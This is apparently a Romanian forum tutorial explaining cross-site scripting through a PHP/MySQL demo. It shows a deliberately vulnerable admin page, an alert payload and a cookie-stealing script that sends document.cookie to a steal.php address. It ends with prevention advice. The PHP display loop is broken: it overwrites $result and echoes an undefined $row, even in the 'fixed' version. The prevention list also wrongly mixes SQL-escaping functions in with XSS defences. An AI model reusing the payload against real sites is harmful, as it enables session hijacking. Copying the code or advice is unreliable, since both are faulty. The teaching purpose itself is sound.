Definitia XSS-ului
Un atac XSS (Cross-Site Scripting) reprezinta o vulnerabilitate a aplicatiilor web ce apare atunci cand acestea afisaza date care nu sunt valide. Acesta consta in introducerea unui cod, pentru executia acestuia in respectivul site. De obicei, codul este scris in unul din urmatoarele limbaje: JavaScript, (X)HTML,VBScript, ActiveX, Java sau Flash (ar mai fi si altele).
Scopul XSS-ului
Scopul acestui tip de atac este de a fura cookie-urile unor anumiti utilizatori sau pentru a fura diferite informatii utile despre utilizatori, necesare hackerilor. In general aceste atacuri ii vizeaza pe cei cu drepturi privilegiate ale aplicatiei web (administratori sau alt rang important).
In general atacurile implica doua lucruri (hackerul si site-ul), insa XSS-ul implica trei (hackerul, site-ul si utilizatorii site-ului).
Despre XSS
Atacurile de acest tip se folosesc de datele ce vin din exterior. Asadar formularele, e-mail-ul web,fisierele de tip XML sau RSS si bazele de date sunt cel mai des folosite de hackeri.
Pentru a intelege mai bine, va voi face o schema, dupa care actioneaza majoritatea hackerilor.
- Hackerul intra pe site
- Hackerul verifica daca vulnerabilitatea este prezenta
- In cazul in care site-ul este vulnerabil, el introduce date care vor fi stocate in baza de date
- Un utilizator intra pe o pagina a site-ului care se conecteaza la baza de date si afisaza datele stocate in aceasta (incluzand cele introduse de hacker)
- Cookie-urile utilizatorului sunt trimise hackerului
Exemplu XSS
Va voi arata prin acest exemplu, cum un hacker poate fura un cont cu ajutorul acestei vulnerabilitati.
Vom crea o noua baza de date (folosind phpMyAdmin) numita xss si tabelul users, cu doua campuri:user si pass.
Code:
CREATE DATABASE xss; USE xss; CREATE TABLE users (id INT NOT NULL AUTO_INCREMENT, user VARCHAR(20) NOT NULL, pass VARCHAR(32) NOT NULL, PRIMARY KEY(id));
Code:
<html> <head> <title>Script inregistrare</title> </head> <body> <?php if(isset($_POST['submit'])) { $_POST['user'] = mysql_real_escape_string($_POST['user']); $_POST['pass'] = md5($_POST['pass']); @mysql_connect('localhost', 'root', '') or die('MySQL error.'); @mysql_select_db('xss') or die('MySQL error.'); $sql = "INSERT INTO users (user, pass) VALUES ('{$_POST['user']}', '{$_POST['pass']}')"; $result = @mysql_query($sql) or die('MySQL error.'); @mysql_close(); } else { ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> Username: <input type="text" name="user" /> Password: <input type="password" name="pass" /> <input type="submit" name="submit" value="Register" /> </form> <?php } ?> </body> </html>
Code:
<html> <head> <title>Panou de administrare</title> </head> <body> Utilizatori inregistrati: <?php @mysql_connect('localhost', 'root', '') or die('MySQL error.'); @mysql_select_db('xss') or die('MySQL error.'); $sql = "SELECT * FROM users"; $result = @mysql_query($sql) or die('MySQL error.'); while($result = mysql_fetch_array($result)) { echo $row['user'].' '; } ?> </body> </html>
Code:
<script>alert("Ti-am spart site-ul!");</script>
Code:
<script>document.location = 'http://www.site.com/steal.php?cookies=' + document.cookie;</script>
Pentru a preveni acest lucru, scriptul de afisare al utilizatorului va trebui sa arate asa:
Code:
<html> <head> <title>Panou de administrare</title> </head> <body> Utilizatori inregistrati: <?php @mysql_connect('localhost', 'root', '') or die('MySQL error.'); @mysql_select_db('xss') or die('MySQL error.'); $sql = "SELECT * FROM users"; $result = @mysql_query($sql) or die('MySQL error.'); while($result = mysql_fetch_array($result)) { echo htmlentities($row['user']).' '; } ?> </body> </html>
Prevenirea XSS-ului
Asadar cum putem preveni atacurile XSS? Cateva functii PHP care ne vor ajuta sunt:
- htmlentities();
- htmlspecialchars();
- strip_tags();
- mysql_escape_string();
- mysql_real_escape_string();
- addslashes();
Sper sa va fie de folos .
sursa: http://rstcenter.com/forum/11667-cum-sa-te-protejezi-de-xss.rst